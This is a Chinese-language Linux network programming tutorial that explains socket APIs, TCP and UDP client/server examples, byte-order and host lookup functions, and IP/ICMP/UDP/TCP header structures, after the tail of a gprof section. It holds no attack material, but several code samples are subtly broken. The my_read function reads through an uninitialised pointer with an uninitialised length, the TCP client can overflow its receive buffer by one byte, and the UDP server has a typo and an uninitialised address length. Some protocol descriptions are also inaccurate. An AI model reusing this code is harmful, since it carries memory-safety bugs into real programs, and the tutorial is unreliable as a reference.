69.23 0.09 0.09 1 90000.00 103333.33 my_print2
30.77 0.13 0.04 3 13333.33 13333.33 count_sum
0.00 0.13 0.00 2 0.00 13333.33 my_print

% 执行此函数所占用的时间占程序总
time 执行时间的百分比

cumulative 累计秒数 执行此函数花费的时间
seconds （包括此函数调用其它函数花费的时间）

self 执行此函数花费的时间
seconds （调用其它函数花费的时间不计算在内）

calls 调用次数

self 每此执行此函数花费的微秒时间
us/call

total 每此执行此函数加上它调用其它函数
us/call 花费的微秒时间

name 函数名

由以上数据可以看出，执行my_print()函数本身没花费什么时间，但是它又调用了
count_sum()函数，所以累计秒数为0.13.

技巧: gprof 产生的剖析数据很大, 如果你想检查这些数据的话最好把输出重定向到一个
文件里.

文章来源：http://www.linuxaid.com.cn/support/showfom.jsp?i=1461

~完~

　8)Linux程序设计入门--网络编程

Linux系统的一个主要特点是他的网络功能非常强大。随着网络的日益普及，基于网络的
应用也将越来越多。 在这个网络时代，掌握了Linux的网络编程技术，将令每一个人处
于不败之地，学习Linux的网络编程，可以让我们真正的体会到网络的魅力。 想成为一
位真正的hacker，必须掌握网络编程技术。
现在书店里面已经有了许多关于Linux网络编程方面的书籍，网络上也有了许多关于
网络编程方面的教材，大家都可以 去看一看的。在这里我会和大家一起来领会Linux网
络编程的奥妙，由于我学习Linux的网络编程也开始不久，所以我下面所说的肯定会有错
误的， 还请大家指点出来，在这里我先谢谢大家了。
在这一个章节里面，我会和以前的几个章节不同，在前面我都是概括的说了一下，
从现在开始我会尽可能的详细的说明每一个函数及其用法。好了让我们去领会Linux的伟
大的魅力吧！
开始进入网络编程



网络编程(1)

1. Linux网络知识介绍
1.1 客户端程序和服务端程序
网络程序和普通的程序有一个最大的区别是网络程序是由两个部分组成的--客户端和服
务器端.
网络程序是先有服务器程序启动,等待客户端的程序运行并建立连接.一般的来说是服务
端的程序 在一个端口上监听,直到有一个客户端的程序发来了请求.
1.2 常用的命令
由于网络程序是有两个部分组成,所以在调试的时候比较麻烦,为此我们有必要知道一些
常用的网络命令
netstat
命令netstat是用来显示网络的连接,路由表和接口统计等网络的信息.netstat有许多的
选项 我们常用的选项是 -an 用来显示详细的网络状态.至于其它的选项我们可以使用帮
助手册获得详细的情况.
telnet
telnet是一个用来远程控制的程序,但是我们完全可以用这个程序来调试我们的服务端程
序的. 比如我们的服务器程序在监听8888端口,我们可以用telnet localhost 8888来查
看服务端的状况.
1.3 TCP/UDP介绍
TCP(Transfer Control Protocol)传输控制协议是一种面向连接的协议,当我们的网络程
序使用 这个协议的时候,网络可以保证我们的客户端和服务端的连接是可靠的,安全的.

UDP(User Datagram Protocol)用户数据报协议是一种非面向连接的协议,这种协议并不
能保证我们 的网络程序的连接是可靠的,所以我们现在编写的程序一般是采用TCP协议的
..

网络编程（2）

2. 初等网络函数介绍（TCP）
Linux系统是通过提供套接字(socket)来进行网络编程的.网络程序通过socket和其它
几个函数的调用,会返回一个 通讯的文件描述符,我们可以将这个描述符看成普通的文件
的描述符来操作,这就是linux的设备无关性的 好处.我们可以通过向描述符读写操作实
现网络之间的数据交流.
2.1 socket
int socket(int domain, int type,int protocol)
domain:说明我们网络程序所在的主机采用的通讯协族(AF_UNIX和AF_INET等). AF_UN
IX只能够用于单一的Unix系统进程间通信,而AF_INET是针对Internet的,因而可以允许在
远程 主机之间通信(当我们 man socket时发现 domain可选项是 PF_*而不是AF_*,因为
glibc是posix的实现 所以用PF代替了AF,不过我们都可以使用的).
type:我们网络程序所采用的通讯协议(SOCK_STREAM,SOCK_DGRAM等) SOCK_STREAM表明
我们用的是TCP协议,这样会提供按顺序的,可靠,双向,面向连接的比特流. SOCK_DGRAM
表明我们用的是UDP协议,这样只会提供定长的,不可靠,无连接的通信.
protocol:由于我们指定了type,所以这个地方我们一般只要用0来代替就可以了 sock
et为网络通讯做基本的准备.成功时返回文件描述符,失败时返回-1,看errno可知道出错
的详细情况.
2.2 bind
int bind(int sockfd, struct sockaddr *my_addr, int addrlen)
sockfd:是由socket调用返回的文件描述符.
addrlen:是sockaddr结构的长度.
my_addr:是一个指向sockaddr的指针. 在<linux/socket.h>中有 sockaddr的定义
struct sockaddr{
unisgned short as_family;
char sa_data[14];
};
不过由于系统的兼容性,我们一般不用这个头文件,而使用另外一个结构(struct sock
addr_in) 来代替.在<linux/in.h>中有sockaddr_in的定义
struct sockaddr_in{
unsigned short sin_family;
unsigned short int sin_port;
struct in_addr sin_addr;
unsigned char sin_zero[8];
我们主要使用Internet所以sin_family一般为AF_INET,sin_addr设置为INADDR_ANY表
示可以 和任何的主机通信,sin_port是我们要监听的端口号.sin_zero[8]是用来填充的
.. bind将本地的端口同socket返回的文件描述符捆绑在一起.成功是返回0,失败的情况和
socket一样
2.3 listen
int listen(int sockfd,int backlog)
sockfd:是bind后的文件描述符.
backlog:设置请求排队的最大长度.当有多个客户端程序和服务端相连时, 使用这个表示
可以介绍的排队长度. listen函数将bind的文件描述符变为监听套接字.返回的情况和b
ind一样.
2.4 accept
int accept(int sockfd, struct sockaddr *addr,int *addrlen)
sockfd:是listen后的文件描述符.
addr,addrlen是用来给客户端的程序填写的,服务器端只要传递指针就可以了. bind,li
sten和accept是服务器端用的函数,accept调用时,服务器端的程序会一直阻塞到有一个
客户程序发出了连接. accept成功时返回最后的服务器端的文件描述符,这个时候服务
器端可以向该描述符写信息了. 失败时返回-1
2.5 connect
int connect(int sockfd, struct sockaddr * serv_addr,int addrlen)
sockfd:socket返回的文件描述符.
serv_addr:储存了服务器端的连接信息.其中sin_add是服务端的地址
addrlen:serv_addr的长度
connect函数是客户端用来同服务端连接的.成功时返回0,sockfd是同服务端通讯的文件
描述符 失败时返回-1.
2.6 实例
服务器端程序
/******* 服务器程序 (server.c) ************/
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sockfd,new_fd;
struct sockaddr_in server_addr;
struct sockaddr_in client_addr;
int sin_size,portnumber;
char hello[]="Hello! Are You Fine?\n";
if(argc!=2)
{
fprintf(stderr,"Usage:%s portnumber\a\n",argv[0]);
exit(1);
}
if((portnumber=atoi(argv[1]))<0)
{
fprintf(stderr,"Usage:%s portnumber\a\n",argv[0]);
exit(1);
}
/* 服务器端开始建立socket描述符 */
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
{
fprintf(stderr,"Socket error:%s\n\a",strerror(errno));
exit(1);
}
/* 服务器端填充 sockaddr结构 */
bzero(&server_addr,sizeof(struct sockaddr_in));
server_addr.sin_family=AF_INET;
server_addr.sin_addr.s_addr=htonl(INADDR_ANY);
server_addr.sin_port=htons(portnumber);
/* 捆绑sockfd描述符 */
if(bind(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr))==
-1)
{
fprintf(stderr,"Bind error:%s\n\a",strerror(errno));
exit(1);
}
/* 监听sockfd描述符 */
if(listen(sockfd,5)==-1)
{
fprintf(stderr,"Listen error:%s\n\a",strerror(errno));
exit(1);
}
while(1)
{
/* 服务器阻塞,直到客户程序建立连接 */
sin_size=sizeof(struct sockaddr_in);
if((new_fd=accept(sockfd,(struct sockaddr *)(&client_addr),&sin_size
))==-1)
{
fprintf(stderr,"Accept error:%s\n\a",strerror(errno));
exit(1);
}
fprintf(stderr,"Server get connection from %s\n",
inet_ntoa(client_addr.sin_addr));
if(write(new_fd,hello,strlen(hello))==-1)
{
fprintf(stderr,"Write Error:%s\n",strerror(errno));
exit(1);
}
/* 这个通讯已经结束 */
close(new_fd);
/* 循环下一个 */
}
close(sockfd);
exit(0);
}
客户端程序
/******* 客户端程序 client.c ************/
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
int main(int argc, char *argv[])
{
int sockfd;
char buffer[1024];
struct sockaddr_in server_addr;
struct hostent *host;
int portnumber,nbytes;
if(argc!=3)
{
fprintf(stderr,"Usage:%s hostname portnumber\a\n",argv[0]);
exit(1);
}
if((host=gethostbyname(argv[1]))==NULL)
{
fprintf(stderr,"Gethostname error\n");
exit(1);
}
if((portnumber=atoi(argv[2]))<0)
{
fprintf(stderr,"Usage:%s hostname portnumber\a\n",argv[0]);
exit(1);
}
/* 客户程序开始建立 sockfd描述符 */
if((sockfd=socket(AF_INET,SOCK_STREAM,0))==-1)
{
fprintf(stderr,"Socket Error:%s\a\n",strerror(errno));
exit(1);
}
/* 客户程序填充服务端的资料 */
bzero(&server_addr,sizeof(server_addr));
server_addr.sin_family=AF_INET;
server_addr.sin_port=htons(portnumber);
server_addr.sin_addr=*((struct in_addr *)host->h_addr);
/* 客户程序发起连接请求 */
if(connect(sockfd,(struct sockaddr *)(&server_addr),sizeof(struct sockaddr)
)==-1)
{
fprintf(stderr,"Connect Error:%s\a\n",strerror(errno));
exit(1);
}
/* 连接成功了 */
if((nbytes=read(sockfd,buffer,1024))==-1)
{
fprintf(stderr,"Read Error:%s\n",strerror(errno));
exit(1);
}
buffer[nbytes]='\0';
printf("I have received:%s\n",buffer);
/* 结束通讯 */
close(sockfd);
exit(0);
}
MakeFile
这里我们使用GNU 的make实用程序来编译. 关于make的详细说明见 Make 使用介绍
######### Makefile ###########
all:server client
server:server.c
gcc $^ -o $@
client:client.c
gcc $^ -o $@
运行make后会产生两个程序server(服务器端)和client(客户端) 先运行./server port
number& (portnumber随便取一个大于1204且不在/etc/services中出现的号码 就用888
8好了),然后运行 ./client localhost 8888 看看有什么结果. (你也可以用telnet和n
etstat试一试.) 上面是一个最简单的网络程序,不过是不是也有点烦.上面有许多函数我
们还没有解释. 我会在下一章进行的详细的说明.
2.7 总结
总的来说网络程序是由两个部分组成的--客户端和服务器端.它们的建立步骤一般是:
服务器端
socket-->bind-->listen-->accept
客户端
socket-->connect
--

网络编程(3)

3. 服务器和客户机的信息函数
这一章我们来学习转换和网络方面的信息函数.
3.1 字节转换函数
在网络上面有着许多类型的机器,这些机器在表示数据的字节顺序是不同的, 比如i386芯
片是低字节在内存地址的低端,高字节在高端,而alpha芯片却相反. 为了统一起来,在Li
nux下面,有专门的字节转换函数.
unsigned long int htonl(unsigned long int hostlong)
unsigned short int htons(unisgned short int hostshort)
unsigned long int ntohl(unsigned long int netlong)
unsigned short int ntohs(unsigned short int netshort)
在这四个转换函数中,h 代表host, n 代表 network.s 代表short l 代表long 第一个函
数的意义是将本机器上的long数据转化为网络上的long. 其他几个函数的意义也差不多
..
3.2 IP和域名的转换
在网络上标志一台机器可以用IP或者是用域名.那么我们怎么去进行转换呢?
struct hostent *gethostbyname(const char *hostname)
struct hostent *gethostbyaddr(const char *addr,int len,int type)
在<netdb.h>中有struct hostent的定义
struct hostent{
char *h_name; /* 主机的正式名称 */
char *h_aliases; /* 主机的别名 */
int h_addrtype; /* 主机的地址类型 AF_INET*/
int h_length; /* 主机的地址长度 对于IP4 是4字节32位*/
char **h_addr_list; /* 主机的IP地址列表 */
}
#define h_addr h_addr_list[0] /* 主机的第一个IP地址*/
gethostbyname可以将机器名(如 linux.yessun.com)转换为一个结构指针.在这个结构里
面储存了域名的信息
gethostbyaddr可以将一个32位的IP地址(C0A80001)转换为结构指针.
这两个函数失败时返回NULL 且设置h_errno错误变量,调用h_strerror()可以得到详细的
出错信息
3.3 字符串的IP和32位的IP转换.
在网络上面我们用的IP都是数字加点(192.168.0.1)构成的, 而在struct in_addr结构中
用的是32位的IP, 我们上面那个32位IP(C0A80001)是的192.168.0.1 为了转换我们可以
使用下面两个函数
int inet_aton(const char *cp,struct in_addr *inp)
char *inet_ntoa(struct in_addr in)
函数里面 a 代表 ascii n 代表network.第一个函数表示将a.b.c.d的IP转换为32位的I
P,存储在 inp指针里面.第二个是将32位IP转换为a.b.c.d的格式.
3.4 服务信息函数
在网络程序里面我们有时候需要知道端口.IP和服务信息.这个时候我们可以使用以下几
个函数
int getsockname(int sockfd,struct sockaddr *localaddr,int *addrlen)
int getpeername(int sockfd,struct sockaddr *peeraddr, int *addrlen)
struct servent *getservbyname(const char *servname,const char *protoname)
struct servent *getservbyport(int port,const char *protoname)
struct servent
{
char *s_name; /* 正式服务名 */
char **s_aliases; /* 别名列表 */
int s_port; /* 端口号 */
char *s_proto; /* 使用的协议 */
}
一般我们很少用这几个函数.对应客户端,当我们要得到连接的端口号时在connect调用成
功后使用可得到 系统分配的端口号.对于服务端,我们用INADDR_ANY填充后,为了得到连
接的IP我们可以在accept调用成功后 使用而得到IP地址.
在网络上有许多的默认端口和服务,比如端口21对ftp80对应WWW.为了得到指定的端口号
的服务 我们可以调用第四个函数,相反为了得到端口号可以调用第三个函数.
3.5 一个例子
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc ,char **argv)
{
struct sockaddr_in addr;
struct hostent *host;
char **alias;
if(argc<2)
{
fprintf(stderr,"Usage:%s hostname|ip..\n\a",argv[0]);
exit(1);
}
argv++;
for(;*argv!=NULL;argv++)
{
/* 这里我们假设是IP*/
if(inet_aton(*argv,&addr.sin_addr)!=0)
{
host=gethostbyaddr((char *)&addr.sin_addr,4,AF_INET);
printf("Address information of Ip %s\n",*argv);
}
else
{
/* 失败,难道是域名?*/
host=gethostbyname(*argv); printf("Address information

of host %s\n",*argv);
}
if(host==NULL)
{
/* 都不是 ,算了不找了*/
fprintf(stderr,"No address information of %s\n",*arg
v);
continue;
}
printf("Official host name %s\n",host->h_name);
printf("Name aliases:");
for(alias=host->h_aliases;*alias!=NULL;alias++)
printf("%s ,",*alias);
printf("\nIp address:");
for(alias=host->h_addr_list;*alias!=NULL;alias++)
printf("%s ,",inet_ntoa(*(struct in_addr *)(*alias)));
}
}
在这个例子里面,为了判断用户输入的是IP还是域名我们调用了两个函数,第一次我们假
设输入的是IP所以调用inet_aton, 失败的时候,再调用gethostbyname而得到信息.
--

网络编程(4)

4. 完整的读写函数
一旦我们建立了连接,我们的下一步就是进行通信了.在Linux下面把我们前面建立的通道
看成是文件描述符,这样服务器端和客户端进行通信时候,只要往文件描述符里面读写东
西了. 就象我们往文件读写一样.
4.1 写函数write
ssize_t write(int fd,const void *buf,size_t nbytes)
write函数将buf中的nbytes字节内容写入文件描述符fd.成功时返回写的字节数.失败时
返回-1. 并设置errno变量. 在网络程序中,当我们向套接字文件描述符写时有俩种可能
..
1)write的返回值大于0,表示写了部分或者是全部的数据.
2)返回的值小于0,此时出现了错误.我们要根据错误类型来处理.
如果错误为EINTR表示在写的时候出现了中断错误.
如果为EPIPE表示网络连接出现了问题(对方已经关闭了连接).
为了处理以上的情况,我们自己编写一个写函数来处理这几种情况.
int my_write(int fd,void *buffer,int length)
{
int bytes_left;
int written_bytes;
char *ptr;
ptr=buffer;
bytes_left=length;
while(bytes_left>0)
{
/* 开始写*/
written_bytes=write(fd,ptr,bytes_left);
if(written_bytes<=0) /* 出错了*/
{
if(errno==EINTR) /* 中断错误 我们继续写*/
written_bytes=0;
else /* 其他错误 没有办法,只好撤退了*/
return(-1);
}
bytes_left-=written_bytes;
ptr+=written_bytes; /* 从剩下的地方继续写 */
}
return(0);
}
4.2 读函数read
ssize_t read(int fd,void *buf,size_t nbyte) read函数是负责从fd中读取内容.当读
成功时,read返回实际所读的字节数,如果返回的值是0 表示已经读到文件的结束了,小于
0表示出现了错误.如果错误为EINTR说明读是由中断引起的, 如果是ECONNREST表示网络
连接出了问题. 和上面一样,我们也写一个自己的读函数.
int my_read(int fd,void *buffer,int length)
{
int bytes_left;
int bytes_read;
char *ptr;
bytes_left=length;
while(bytes_left>0)
{
bytes_read=read(fd,ptr,bytes_read);
if(bytes_read<0)
{
if(errno==EINTR)
bytes_read=0;
else
return(-1);
}
else if(bytes_read==0)
break;
bytes_left-=bytes_read;
ptr+=bytes_read;
}
return(length-bytes_left);
}
4.3 数据的传递
有了上面的两个函数,我们就可以向客户端或者是服务端传递数据了.比如我们要传递一
个结构.可以使用如下方式
/* 客户端向服务端写 */
struct my_struct my_struct_client;
write(fd,(void *)&my_struct_client,sizeof(struct my_struct);
/* 服务端的读*/
char buffer[sizeof(struct my_struct)];
struct *my_struct_server;
read(fd,(void *)buffer,sizeof(struct my_struct));
my_struct_server=(struct my_struct *)buffer;
在网络上传递数据时我们一般都是把数据转化为char类型的数据传递.接收的时候也是一
样的 注意的是我们没有必要在网络上传递指针(因为传递指针是没有任何意义的,我们必
须传递指针所指向的内容)
--

网络编程(5)

5. 用户数据报发送
我们前面已经学习网络程序的一个很大的部分,由这个部分的知识,我们实际上可以写出
大部分的基于TCP协议的网络程序了.现在在Linux下的大部分程序都是用我们上面所学的
知识来写的.我们可以去找一些源程序来参考一下.这一章,我们简单的学习一下基于UDP
协议的网络程序.
5.1 两个常用的函数
int recvfrom(int sockfd,void *buf,int len,unsigned int flags,struct socka
ddr * from int *fromlen)
int sendto(int sockfd,const void *msg,int len,unsigned int flags,struct s
ockaddr *to int tolen)
sockfd,buf,len的意义和read,write一样,分别表示套接字描述符,发送或接收的缓冲区
及大小.recvfrom负责从sockfd接收数据,如果from不是NULL,那么在from里面存储了信息
来源的情况,如果对信息的来源不感兴趣,可以将from和fromlen设置为NULL.sendto负责
向to发送信息.此时在to里面存储了收信息方的详细资料.
5.2 一个实例
/* 服务端程序 server.c */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <errno.h>
#define SERVER_PORT 8888
#define MAX_MSG_SIZE 1024
void udps_respon(int sockfd)
{
struct sockaddr_in addr;
int addrlen,n;
char msg[MAX_MSG_SIZE];
while(1)
{ /* 从网络上度,写到网络上面去 */
n=recvfrom(sockfd,msg,MAX_MSG_SIZE,0,
(struct sockaddr*)&addr,&addrlen);
msg[n]=0;
/* 显示服务端已经收到了信息 */
fprintf(stdout,"I have received %s",msg);
sendto(sockfd,msg,n,0,(struct sockaddr*)&addr,addrlen);
}
}
int main(void)
{
int sockfd;
struct sockaddr_in addr;
sockfd=socket(AF_INET,SOCK_DGRAM,0);
if(sockfd<0)
{
fprintf(stderr,"Socket Error:%s\n",strerror(errno));
exit(1);
}
bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_addr.s_addr=htonl(INADDR_ANY);
addr.sin_port=htons(SERVER_PORT);
if(bind(sockfd,(struct sockaddr *)&ddr,sizeof(struct sockaddr_in))<0
)
{
fprintf(stderr,"Bind Error:%s\n",strerror(errno));
exit(1);
}
udps_respon(sockfd);
close(sockfd);
}
/* 客户端程序 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#define MAX_BUF_SIZE 1024
void udpc_requ(int sockfd,const struct sockaddr_in *addr,int len)
{
char buffer[MAX_BUF_SIZE];
int n;
while(1)
{ /* 从键盘读入,写到服务端 */
fgets(buffer,MAX_BUF_SIZE,stdin);
sendto(sockfd,buffer,strlen(buffer),0,addr,len);
bzero(buffer,MAX_BUF_SIZE);
/* 从网络上读,写到屏幕上 */
n=recvfrom(sockfd,buffer,MAX_BUF_SIZE,0,NULL,NULL);
buffer[n]=0;
fputs(buffer,stdout);
}
}
int main(int argc,char **argv)
{
int sockfd,port;
struct sockaddr_in addr;
if(argc!=3)
{
fprintf(stderr,"Usage:%s server_ip server_port\n",argv[0]);
exit(1);
}
if((port=atoi(argv[2]))<0)
{
fprintf(stderr,"Usage:%s server_ip server_port\n",argv[0]);
exit(1);
}
sockfd=socket(AF_INET,SOCK_DGRAM,0);
if(sockfd<0)
{
fprintf(stderr,"Socket Error:%s\n",strerror(errno));
exit(1);
}
/* 填充服务端的资料 */
bzero(&addr,sizeof(struct sockaddr_in));
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(inet_aton(argv[1],&addr.sin_addr)<0)
{
fprintf(stderr,"Ip error:%s\n",strerror(errno));
exit(1);
}
udpc_requ(sockfd,&addr,sizeof(struct sockaddr_in));
close(sockfd);
}
########### 编译文件 Makefile ##########
all:server client
server:server.c
gcc -o server server.c
client:client.c
gcc -o client client.c
clean:
rm -f server
rm -f client
rm -f core
上面的实例如果大家编译运行的话,会发现一个小问题的. 在我机器上面,我先运行服务
端,然后运行客户端.在客户端输入信息,发送到服务端, 在服务端显示已经收到信息,但
是客户端没有反映.再运行一个客户端,向服务端发出信息 却可以得到反应.我想可能是
第一个客户端已经阻塞了.如果谁知道怎么解决的话,请告诉我,谢谢. 由于UDP协议是不
保证可靠接收数据的要求,所以我们在发送信息的时候,系统并不能够保证我们发出的信
息都正确无误的到达目的地.一般的来说我们在编写网络程序的时候都是选用TCP协议的
--

网络编程(6)

6. 高级套接字函数
在前面的几个部分里面,我们已经学会了怎么样从网络上读写信息了.前面的一些函数(r
ead,write)是网络程序里面最基本的函数.也是最原始的通信函数.在这一章里面,我们一
起来学习网络通信的高级函数.这一章我们学习另外几个读写函数.
6.1 recv和send
recv和send函数提供了和read和write差不多的功能.不过它们提供 了第四个参数来控制
读写操作.
int recv(int sockfd,void *buf,int len,int flags)
int send(int sockfd,void *buf,int len,int flags)
前面的三个参数和read,write一样,第四个参数可以是0或者是以下的组合
_______________________________________________________________
| MSG_DONTROUTE | 不查找路由表 |
| MSG_OOB | 接受或者发送带外数据 |
| MSG_PEEK | 查看数据,并不从系统缓冲区移走数据 |
| MSG_WAITALL | 等待所有数据 |
|--------------------------------------------------------------|
MSG_DONTROUTE:是send函数使用的标志.这个标志告诉IP协议.目的主机在本地网络上面
,没有必要查找路由表.这个标志一般用网络诊断和路由程序里面.
MSG_OOB:表示可以接收和发送带外的数据.关于带外数据我们以后会解释的.
MSG_PEEK:是recv函数的使用标志,表示只是从系统缓冲区中读取内容,而不清楚系统缓冲
区的内容.这样下次读的时候,仍然是一样的内容.一般在有多个进程读写数据时可以使用
这个标志.
MSG_WAITALL是recv函数的使用标志,表示等到所有的信息到达时才返回.使用这个标志的
时候recv回一直阻塞,直到指定的条件满足,或者是发生了错误. 1)当读到了指定的字节
时,函数正常返回.返回值等于len 2)当读到了文件的结尾时,函数正常返回.返回值小于
len 3)当操作发生错误时,返回-1,且设置错误为相应的错误号(errno)
如果flags为0,则和read,write一样的操作.还有其它的几个选项,不过我们实际上用的很
少,可以查看 Linux Programmer's Manual得到详细解释.
6.2 recvfrom和sendto
这两个函数一般用在非套接字的网络程序当中(UDP),我们已经在前面学会了.
6.3 recvmsg和sendmsg
recvmsg和sendmsg可以实现前面所有的读写函数的功能.
int recvmsg(int sockfd,struct msghdr *msg,int flags)
int sendmsg(int sockfd,struct msghdr *msg,int flags)
struct msghdr
{
void *msg_name;
int msg_namelen;
struct iovec *msg_iov;
int msg_iovlen;
void *msg_control;
int msg_controllen;
int msg_flags;
}
struct iovec
{
void *iov_base; /* 缓冲区开始的地址 */
size_t iov_len; /* 缓冲区的长度 */
}
msg_name和 msg_namelen当套接字是非面向连接时(UDP),它们存储接收和发送方的地址
信息.msg_name实际上是一个指向struct sockaddr的指针,msg_name是结构的长度.当套
接字是面向连接时,这两个值应设为NULL. msg_iov和msg_iovlen指出接受和发送的缓冲
区内容.msg_iov是一个结构指针,msg_iovlen指出这个结构数组的大小. msg_control和
msg_controllen这两个变量是用来接收和发送控制数据时的 msg_flags指定接受和发送
的操作选项.和recv,send的选项一样
6.4 套接字的关闭
关闭套接字有两个函数close和shutdown.用close时和我们关闭文件一样.
6.5 shutdown
int shutdown(int sockfd,int howto)
TCP连接是双向的(是可读写的),当我们使用close时,会把读写通道都关闭,有时侯我们希
望只关闭一个方向,这个时候我们可以使用shutdown.针对不同的howto,系统回采取不同
的关闭方式.
howto=0这个时候系统会关闭读通道.但是可以继续往接字描述符写.
howto=1关闭写通道,和上面相反,着时候就只可以读了.
howto=2关闭读写通道,和close一样 在多进程程序里面,如果有几个子进程共享一个套接
字时,如果我们使用shutdown, 那么所有的子进程都不能够操作了,这个时候我们只能够
使用close来关闭子进程的套接字描述符.



网络编程(7)

7. TCP/IP协议
你也许听说过TCP/IP协议,那么你知道到底什么是TCP,什么是IP吗?在这一章里面,我们一
起来学习这个目前网络上用最广泛的协议.
7.1 网络传输分层
如果你考过计算机等级考试,那么你就应该已经知道了网络传输分层这个概念.在网络上
,人们为了传输数据时的方便,把网络的传输分为7个层次.分别是:应用层,表示层,会话层
,传输层,网络层,数据链路层和物理层.分好了层以后,传输数据时,上一层如果要数据的
话,就可以直接向下一层要了,而不必要管数据传输的细节.下一层也只向它的上一层提供
数据,而不要去管其它东西了.如果你不想考试,你没有必要去记这些东西的.只要知道是
分层的,而且各层的作用不同.
7.2 IP协议
IP协议是在网络层的协议.它主要完成数据包的发送作用. 下面这个表是IP4的数据包格
式
0 4 8 16 32
--------------------------------------------------
|版本 |首部长度|服务类型| 数据包总长 |
--------------------------------------------------
| 标识 |DF |MF| 碎片偏移 |
--------------------------------------------------
| 生存时间 | 协议 | 首部较验和 |
------------------------------------------------
| 源IP地址 |
------------------------------------------------
| 目的IP地址 |
-------------------------------------------------
| 选项 |
=================================================
| 数据 |
-------------------------------------------------
下面我们看一看IP的结构定义<netinet/ip.h>
struct ip
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
unsigned int ip_hl:4; /* header length */
unsigned int ip_v:4; /* version */
#endif
#if __BYTE_ORDER == __BIG_ENDIAN
unsigned int ip_v:4; /* version */
unsigned int ip_hl:4; /* header length */
#endif
u_int8_t ip_tos; /* type of service */
u_short ip_len; /* total length */
u_short ip_id; /* identification */
u_short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
u_int8_t ip_ttl; /* time to live */
u_int8_t ip_p; /* protocol */
u_short ip_sum; /* checksum */
struct in_addr ip_src, ip_dst; /* source and dest address */
};
ip_vIP协议的版本号,这里是4,现在IPV6已经出来了
ip_hlIP包首部长度,这个值以4字节为单位.IP协议首部的固定长度为20个字节,如果IP包
没有选项,那么这个值为5.
ip_tos服务类型,说明提供的优先权.
ip_len说明IP数据的长度.以字节为单位.
ip_id标识这个IP数据包.
ip_off碎片偏移,这和上面ID一起用来重组碎片的.
ip_ttl生存时间.没经过一个路由的时候减一,直到为0时被抛弃.
ip_p协议,表示创建这个IP数据包的高层协议.如TCP,UDP协议.
ip_sum首部校验和,提供对首部数据的校验.
ip_src,ip_dst发送者和接收者的IP地址
关于IP协议的详细情况,请参考 RFC791
7.3 ICMP协议
ICMP是消息控制协议,也处于网络层.在网络上传递IP数据包时,如果发生了错误,那么就
会用ICMP协议来报告错误.
ICMP包的结构如下:
0 8 16 32
---------------------------------------------------------------------
| 类型 | 代码 | 校验和 |
--------------------------------------------------------------------
| 数据 | 数据 |
--------------------------------------------------------------------
ICMP在<netinet/ip_icmp.h>中的定义是
struct icmphdr
{
u_int8_t type; /* message type */
u_int8_t code; /* type sub-code */
u_int16_t checksum;
union
{
struct
{
u_int16_t id;
u_int16_t sequence;
} echo; /* echo datagram */
u_int32_t gateway; /* gateway address */
struct
{
u_int16_t __unused;
u_int16_t mtu;
} frag; /* path mtu discovery */
} un;
};
关于ICMP协议的详细情况可以查看 RFC792
7.4 UDP协议
UDP协议是建立在IP协议基础之上的,用在传输层的协议.UDP和IP协议一样是不可靠的数
据报服务.UDP的头格式为:
0 16 32
---------------------------------------------------
| UDP源端口 | UDP目的端口 |
---------------------------------------------------
| UDP数据报长度 | UDP数据报校验 |
---------------------------------------------------
UDP结构在<netinet/udp.h>中的定义为:
struct udphdr {
u_int16_t source;
u_int16_t dest;
u_int16_t len;
u_int16_t check;
};
关于UDP协议的详细情况,请参考 RFC768
7.5 TCP
TCP协议也是建立在IP协议之上的,不过TCP协议是可靠的.按照顺序发送的.TCP的数据结
构比前面的结构都要复杂.
0 4 8 10 16 24 32
-------------------------------------------------------------------
| 源端口 | 目的端口 |
-------------------------------------------------------------------
| 序列号 |
------------------------------------------------------------------
| 确认号 |
------------------------------------------------------------------
| | |U|A|P|S|F| |
|首部长度| 保留 |R|C|S|Y|I| 窗口 |
| | |G|K|H|N|N| |
-----------------------------------------------------------------
| 校验和 | 紧急指针 |
-----------------------------------------------------------------
| 选项 | 填充字节 |
-----------------------------------------------------------------
TCP的结构在<netinet/tcp.h>中定义为:
struct tcphdr
{
u_int16_t source;
u_int16_t dest;
u_int32_t seq;
u_int32_t ack_seq;
#if __BYTE_ORDER == __LITTLE_ENDIAN
u_int16_t res1:4;
u_int16_t doff:4;
u_int16_t fin:1;
u_int16_t syn:1;
u_int16_t rst:1;
u_int16_t psh:1;
u_int16_t ack:1;
u_int16_t urg:1;
u_int16_t res2:2;
#elif __BYTE_ORDER == __BIG_ENDIAN
u_int16_t doff:4;
u_int16_t res1:4;
u_int16_t res2:2;
u_int16_t urg:1;
u_int16_t ack:1;
u_int16_t psh:1;
u_int16_t rst:1;
u_int16_t syn:1;
u_int16_t fin:1;
#endif
u_int16_t window;
u_int16_t check;
u_int16_t urg_prt;
};
source发送TCP数据的源端口
dest接受TCP数据的目的端口
seq标识该TCP所包含的数据字节的开始序列号
ack_seq确认序列号,表示接受方下一次接受的数据序列号.
doff数据首部长度.和IP协议一样,以4字节为单位.一般的时候为5
urg如果设置紧急数据指针,则该位为1
ack如果确认号正确,那么为1
psh如果设置为1,那么接收方收到数据后,立即交给上一层程序
rst为1的时候,表示请求重新连接
syn为1的时候,表示请求建立连接
fin为1的时候,表示亲戚关闭连接
window窗口,告诉接收者可以接收的大小
check对TCP数据进行较核
urg_ptr如果urg=1,那么指出紧急数据对于历史数据开始的序列号的偏移值
关于TCP协议的详细情况,请查看 RFC793
